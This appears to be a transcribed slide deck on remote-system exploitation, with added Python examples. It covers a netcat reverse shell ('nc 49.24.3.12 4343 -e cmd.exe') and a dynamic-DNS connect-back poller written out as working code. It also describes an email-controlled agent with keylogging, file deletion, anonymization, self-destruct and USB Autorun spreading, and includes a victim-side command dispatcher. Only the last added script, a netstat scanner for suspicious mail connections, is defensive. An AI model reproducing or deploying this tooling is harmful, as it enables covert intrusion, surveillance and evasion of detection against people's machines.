Handle Exploitation of Remote System Without Being Online (Merchant Bhaumik)
1. Handle Exploitation of Remote System
Without Being Online !!
By
Merchant Bhaumik
6. Who Am I ?
• Currently helping local law enforcement and helping
to secure some government websites
• Developer of the IND 360 Intrusion Detection System
(host-based as well as network-based detection)
• Communicating with the Metasploit team to develop a concept
called "Universal Payload"
9. Jack's Situation
Jack works in a company in which all computers sit behind a NAT box.
He has decided to break into one of the systems in his office and get a shell
from the office machine back to his home computer.
10. Problems For Jack
• The company runs a NIDS/IPS (network IDS), so no inbound connections
reach the office machines
• He does not know which IP address his ISP has allocated to him
• He cannot use any mechanism that constantly sends outbound traffic
(a steady outbound beacon would stand out)
11. Good Thing For Jack
• Jack's office allows him to access his Gmail account and allows
some outbound traffic
13. Why Reverse Shell ?
• A reverse shell is one of the most effective methods for bypassing
network intrusion detection systems and (most) firewalls
• Because some of these network IDSs only monitor inbound connections,
not outbound ones
• Jack's office has a DMZ network
14. Diagram 1
[Network diagram: Jack's home machine (individual IP 49.24.3.12) on the Internet;
the office public IP 117.254.4.123; behind it the DMZ with internal hosts
192.168.1.1 to 192.168.1.5]
15. Diagram 2 (Normal Attack !)
[Same network diagram: attacker IP 49.24.3.12 on the Internet, office public IP
117.254.4.123, internal hosts 192.168.1.1 to 192.168.1.4 in the DMZ, one of them
the victim]
Step I : Attacker starts a handler on port 4343
nc -l -p 4343
Step II : Victim connects back to the attacker with a shell
nc 49.24.3.12 4343 -e cmd.exe
16. Normal Flow Of Getting Reverse Shell
Step I : Exploit ! (vulnerability injection and all that)
Step II : Attacker starts handler
Step III : Victim sends reverse shell to the attacker's machine (reverse shell scenario)
Step IV : Attacker wins !
17. But What's Wrong With Jack?
He does not know what IP address has been allocated to his computer
(dynamic IP allocation by ISPs)
19. My Way
Step I : Exploit ! (vulnerability injection and all that)
Step II : Attacker starts handler (starting the handler on the local machine is optional !)
Step III : Victim sends reverse shell to the attacker's machine (reverse shell scenario)
Step IV : Attacker wins !
20. Flow Of Execution
[Flowchart]
Attacker launches the attack -> exe running in the victim machine
-> Has the attacker updated the IP ?
   No !! -> the exe keeps running in the victim machine and checks again
   Yes !! -> the attacker receives the reverse shell
* If the attacker is not online, the exe is still up and running in the remote
machine, and when the attacker updates the DNS records the reverse shell is on
the attacker's desk !!
21. Mechanism
• If the code (first part) receives a positive acknowledgement for the packets
it sends, Jack gets the reverse shell
• Else it keeps running in the victim machine and waits for an acknowledgement
from the attacker's machine
22. Dynamic DNS Way (Initially !)
• First Part : catchme.dyndns-ip.com ( 255.255.255.255 )
• Second Part : payload.dyndns-ip.com ( 255.255.255.255 )
The new final exe (New.exe) consists of the first part and the second part,
executed synchronously, as a single exe
23. Dynamic DNS Way (Finally !)
• First Part : catchme.dyndns-ip.com ( 127.0.0.1 )
• Second Part : payload.dyndns-ip.com ( Attacker's IP )
The new final exe (New.exe) consists of the first part and the second part,
executed synchronously, as a single exe
24. Metasploit !!!!!
• You can embed my method (or my exe) with the Metasploit payload of your choice.
* The structure of the new exe is as follows :
The new final exe (New.exe) consists of my tool and the MSF payload
( LHOST = Dynamic ), executed synchronously, as a single exe
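The two-record "go signal" from slides 21 to 24, written out as an added example so the mechanism can be run and tested offline. This is not the talk's own tool: the two hostnames are the ones on the slides, but the injectable `resolve` callable, the wait/go/error states, the target sanity check and the poll interval are this example's assumptions. The resolved payload address is what slide 24 calls `LHOST = Dynamic`; the connect-back stage is reduced to a plain TCP hello rather than a shell.

```python
"""
Added example (not the tool from the talk): the dynamic-DNS go signal of
slides 21-24 as a small, offline-testable poller.

Assumed, not from the slides: the 'resolve' callable, the state names,
the target sanity check and the poll interval.
"""
import ipaddress
import socket
import time
from typing import Callable, Optional, Tuple

CATCHME_HOST = "catchme.dyndns-ip.com"   # first part: "is the attacker ready?" record
PAYLOAD_HOST = "payload.dyndns-ip.com"   # second part: record carrying the attacker's IP

PLACEHOLDER_IP = "255.255.255.255"       # slide 22: both records park here while idle
GO_SIGNAL_IP = "127.0.0.1"               # slide 23: catchme flips to this when Jack is online

Resolver = Callable[[str], str]          # hostname -> dotted IPv4 (e.g. socket.gethostbyname)


def is_usable_target(ip: str) -> bool:
    """True if 'ip' could plausibly be the attacker's real address.
    The placeholder, loopback, unspecified, multicast and reserved
    addresses are never a valid connect-back target."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    if ip == PLACEHOLDER_IP:
        return False
    return not (addr.is_loopback or addr.is_unspecified
                or addr.is_multicast or addr.is_reserved)


def check_signal(resolve: Resolver = socket.gethostbyname) -> Tuple[str, Optional[str]]:
    """One poll of the two records.

    Returns ("wait", None)      catchme is not 127.0.0.1, or payload not usable yet
            ("go", target_ip)   catchme is 127.0.0.1 and payload holds a usable IP
            ("error", reason)   a lookup failed (no network, NXDOMAIN, ...)
    """
    try:
        signal = resolve(CATCHME_HOST)
    except OSError as exc:                      # socket.gaierror is an OSError
        return ("error", f"catchme lookup failed: {exc}")
    if signal != GO_SIGNAL_IP:
        return ("wait", None)                   # slide 22 state: attacker not ready

    try:
        target = resolve(PAYLOAD_HOST)
    except OSError as exc:
        return ("error", f"payload lookup failed: {exc}")
    if not is_usable_target(target):
        return ("wait", None)                   # go flag set, but IP not updated yet
    return ("go", target)                       # slide 23 state: connect back to target


def wait_for_go(resolve: Resolver = socket.gethostbyname,
                interval_s: float = 300.0,
                max_polls: Optional[int] = None,
                sleep: Callable[[float], None] = time.sleep) -> Optional[str]:
    """Poll until the go signal appears; return the attacker's IP, or None
    once max_polls is exhausted. Errors are treated like 'wait', so a victim
    that is temporarily offline simply tries again later (slide 20)."""
    polls = 0
    while max_polls is None or polls < max_polls:
        state, value = check_signal(resolve)
        if state == "go":
            return value
        polls += 1
        sleep(interval_s)
    return None


if __name__ == "__main__":
    # Live run against real DNS; port 4343 is the handler port from slide 15.
    ip = wait_for_go()
    print(f"go signal received, connecting back to {ip}:4343")
    with socket.create_connection((ip, 4343), timeout=10) as s:
        s.sendall(b"hello from the victim side\n")
```

The same two lookups are the defender's indicator: a process that keeps resolving a dynamic-DNS name which answers 255.255.255.255, and later 127.0.0.1, is not doing anything a legitimate application does, so DNS logs (or a resolver that records queries per process) will show the agent long before any connect-back happens.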
25. Hands On Network
[Network diagram: individual IP 49.24.3.12 on the Internet, office public IP
117.254.4.123, internal hosts 192.168.1.1 to 192.168.1.5 in the DMZ]
32. But, Who Is Zombie??
It may be one of the below :
[Slide shows pictures of candidate zombie machines]
33. Features !!
• Execute operating-system-level commands by using emails !
• Get all network card information with the allocated IP addresses !
• Live tracking of the system being used by the victim !
• Get the list of all available accounts !
• Enable/disable key logger !
• All this with Gmail, Yahoo, Hotmail !!
34. About It !
It is a simple application which, once up and running on the victim's
computer, the attacker can control using the Gmail, Yahoo or Hotmail
email services.
There is no need for the attacker to be online to attack the victim
system.
The attacker sends the attack instructions to any of the mail services,
and then it is like sitting at the door and watching for the event,
"when it's gonna open !!"
As soon as the victim connects to the internet, the attack launches and the
results are automatically sent back to the attacker's email address.
35. Cool Benefits !!
• If the email account is accessed through an anonymizing service (pictured on the
slide), the attacker's own address never appears near the victim, which makes
tracing back very hard
• Create a unique password for each individual victim that is infected
• Ability to handle multiple clients simultaneously
• Delete files on the victim's computer by simply sending an email
• The instruction traffic travels inside HTTPS, so network inspection cannot read it
(this hides the commands on the wire; it does not stop host-based antivirus from
flagging the executable itself)
36. Tool Syntax
Password_For_Victim ":" Task_Command ":"
E.g. Pwd$98$ : Account_info :
"Pwd$98$" is the password for this particular victim; "Account_info" is the
command, which sends back an email containing the account information
of the victim computer.
37. Snap Shot 1 (Load Attack Instructions)
[Screenshot of the attacker's console: a field for the individual victim's
password, and commands to send the victim's account info, drive info, and
MAC / network card info]
38. Snap Shot 2 (Get Back Attack Result)
[Screenshot of the attacker's mailbox ("My Email Account"): the result mail
arrives with the victim computer's info attached, as chosen by the attacker]
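The instruction line of slide 36 and the load/result cycle of slides 37 and 38, as an added example of the parsing and dispatch the victim-side agent has to do. This is not the talk's tool: only the line syntax and the example password/command come from the slide; the victim table, the command names other than `Account_info` (`Drive_info`, `Network_info`), the handler bodies and the mail body are constructed for this example.

```python
"""
Added example (not the talk's own tool): parser and dispatcher for the
slide 36 syntax   Password_For_Victim ":" Task_Command ":"
e.g.              Pwd$98$ : Account_info :

Assumed, not from the slides: the victim table, the Drive_info and
Network_info command names, the handler bodies and SAMPLE_BODY.
"""
import hmac
import os
import re
import shutil
import socket
from typing import Callable, Dict, List, Optional, Tuple

# One instruction line: <password> : <command> :   (whitespace optional)
INSTRUCTION_RE = re.compile(
    r"^\s*(?P<password>[^:\s]+)\s*:\s*(?P<command>[A-Za-z_]+)\s*:\s*$")

# Per-victim passwords (slide 35: a unique password per infected victim). Constructed.
VICTIM_PASSWORDS: Dict[str, str] = {
    "victim-01": "Pwd$98$",
    "victim-02": "Xk7!pq2z",
}


def account_info() -> Dict[str, str]:
    """Slide 36's Account_info: who is logged in, on which host."""
    user = os.environ.get("USER") or os.environ.get("USERNAME") or "unknown"
    return {"user": user, "host": socket.gethostname()}


def drive_info() -> Dict[str, int]:
    """Assumed Drive_info command: usage of the system drive, in MiB."""
    usage = shutil.disk_usage(os.path.abspath(os.sep))
    return {"total_mib": usage.total // 2**20, "free_mib": usage.free // 2**20}


def network_info() -> Dict[str, str]:
    """Assumed Network_info command: the host's primary IP (slide 33)."""
    host = socket.gethostname()
    try:
        ip = socket.gethostbyname(host)
    except OSError:
        ip = "unresolved"
    return {"host": host, "ip": ip}


COMMANDS: Dict[str, Callable[[], dict]] = {
    "Account_info": account_info,
    "Drive_info": drive_info,
    "Network_info": network_info,
}


def parse_instruction(line: str) -> Optional[Tuple[str, str]]:
    """Return (password, command) for a well-formed line, else None."""
    m = INSTRUCTION_RE.match(line)
    return (m.group("password"), m.group("command")) if m else None


def authorized(victim_id: str, password: str) -> bool:
    """Constant-time check of the per-victim password."""
    expected = VICTIM_PASSWORDS.get(victim_id)
    return expected is not None and hmac.compare_digest(
        expected.encode(), password.encode())


def process_mail(victim_id: str, body: str) -> List[Tuple[str, object]]:
    """Run every instruction line in a mail body for one victim; return
    [(command, result_or_rejection_reason), ...] in body order. Non-instruction
    lines are ignored; a bad password or unknown command is reported, and a
    handler that raises is reported instead of killing the agent."""
    results: List[Tuple[str, object]] = []
    for line in body.splitlines():
        parsed = parse_instruction(line)
        if parsed is None:
            continue
        password, command = parsed
        if not authorized(victim_id, password):
            results.append((command, "rejected: bad password"))
            continue
        handler = COMMANDS.get(command)
        if handler is None:
            results.append((command, "rejected: unknown command"))
            continue
        try:
            results.append((command, handler()))
        except Exception as exc:  # report, do not die
            results.append((command, f"failed: {exc}"))
    return results


# Constructed mail body: one good line, one wrong password, one unknown command.
SAMPLE_BODY = """\
Hi,

Pwd$98$ : Account_info :
wrongpw : Drive_info :
Pwd$98$ : Format_disk :
--
sent from my phone
"""

if __name__ == "__main__":
    for command, result in process_mail("victim-01", SAMPLE_BODY):
        print(f"{command:>14}: {result}")
```

The per-victim password is the only thing standing between the mailbox and the victim machine, so a mail that arrives with the wrong password is rejected line by line rather than silently dropped; the returned list is exactly what would go back in the result mail of slide 38.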
40. No Fear Of Detection 1
[Diagram: attacker and victim, with no direct connection between them]
No direct connection between attacker and victim
41. No Fear Of Detection 2
Instruction traffic is hidden inside HTTPS ... no digital signatures !!
Ability to self-destruct !
42. How To Spread This Code??
• Autorun.inf on USB drives
• Physical access to the victim's system
• During Metasploit exploitation
43. Further Possible Development !!
This code is flexible enough to be developed further by my hacker friends.
It is also possible in future to send exploits or trojans by using this code.
Anyone can send exploits, trojans, rootkits or backdoors by simply attaching
them to an email and sending it to his own account, or to the account that is
configured in the victim's code.
44. Pros N Cons 1 ! ( Be Transparent !! )
• Advantage: the attacker's own address never shows up at the victim, so as long
as he/she accesses the attacking Gmail account through Tor, an anonymizer, a VPN
or any proxy, there is nothing at the victim's end to trace back.
• The instruction data cannot be inspected in transit, because all traffic
comes over HTTPS.
• Only a single Gmail account is used for both sides: the attacker and the victim
machine both connect to the same account, but the attacker knows it and the
victim does not !!
45. Pros N Cons 2
• Disadvantage: if the victim has the habit of checking current connections
with commands like 'netstat -n', it is possible to spot the Gmail connection
when there is actually no browser activity. But it is still difficult to
detect, because the process runs in hidden mode.
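The defender's version of the netstat check above, as an added example that is not part of the talk. A hidden window does not hide a socket: the owning process still shows up when netstat is asked for it, so the check is "which processes hold sessions to mail or HTTPS ports, and are they ones that should". The sample is constructed to look like Windows `netstat -nob` output (owner in `[brackets]` on the line after the connection); the allow-list of browsers and mail clients and the port set are this example's own choices.

```python
"""
Added example (not from the talk): the defender's side of slide 45.
Scans netstat-style output for mail/HTTPS sessions owned by processes
that have no business talking to a mail service.

Assumed, not from the slides: the 'netstat -nob' layout of the constructed
sample, the allow-list and the port set.
"""
import re
from dataclasses import dataclass
from typing import List

MAIL_PORTS = {443, 465, 587, 993}          # HTTPS webmail, SMTPS, submission, IMAPS
EXPECTED_MAIL_PROCESSES = {                 # processes allowed to hold such sessions
    "chrome.exe", "firefox.exe", "msedge.exe", "iexplore.exe",
    "outlook.exe", "thunderbird.exe",
}

CONN_RE = re.compile(
    r"^\s*(?P<proto>TCP)\s+(?P<local>\S+)\s+(?P<remote>\S+)\s+"
    r"(?P<state>[A-Z_]+)\s+(?P<pid>\d+)\s*$")
OWNER_RE = re.compile(r"^\s*\[(?P<exe>[^\]]+)\]\s*$")


@dataclass
class Conn:
    proto: str
    local: str
    remote: str
    state: str
    pid: int
    owner: str = "?"                      # '?' when netstat could not name the owner

    @property
    def remote_port(self) -> int:
        return int(self.remote.rsplit(":", 1)[1])


def parse_netstat_nob(text: str) -> List[Conn]:
    """Parse TCP rows; an [owner.exe] line attaches to the row before it."""
    conns: List[Conn] = []
    for line in text.splitlines():
        m = CONN_RE.match(line)
        if m:
            conns.append(Conn(m["proto"], m["local"], m["remote"],
                              m["state"], int(m["pid"])))
            continue
        m = OWNER_RE.match(line)
        if m and conns:
            conns[-1].owner = m["exe"]
    return conns


def suspicious_mail_connections(conns: List[Conn]) -> List[Conn]:
    """Established sessions to a mail/HTTPS port from an unexpected owner."""
    return [c for c in conns
            if c.state == "ESTABLISHED"
            and c.remote_port in MAIL_PORTS
            and c.owner.lower() not in EXPECTED_MAIL_PROCESSES]


# Constructed sample shaped like 'netstat -nob'; addresses and names are made up.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    192.168.1.3:51234      142.250.74.5:443       ESTABLISHED     4120
 [chrome.exe]
  TCP    192.168.1.3:51240      74.125.200.108:443     ESTABLISHED     3356
 [sysupdate.exe]
  TCP    192.168.1.3:51251      64.233.184.109:993     ESTABLISHED     2288
 [updater.exe]
  TCP    192.168.1.3:51260      192.168.1.10:445       ESTABLISHED     4
  Can not obtain ownership information
"""

if __name__ == "__main__":
    for c in suspicious_mail_connections(parse_netstat_nob(SAMPLE_NETSTAT)):
        print(f"pid {c.pid} {c.owner} -> {c.remote} ({c.state}): "
              "not a browser or mail client")
```

The allow-list is a starting point, not a verdict: legitimate updaters and system services also hold HTTPS sessions, so the flagged rows are what to look at, with the process path and the remote address answering whether it is really a webmail endpoint.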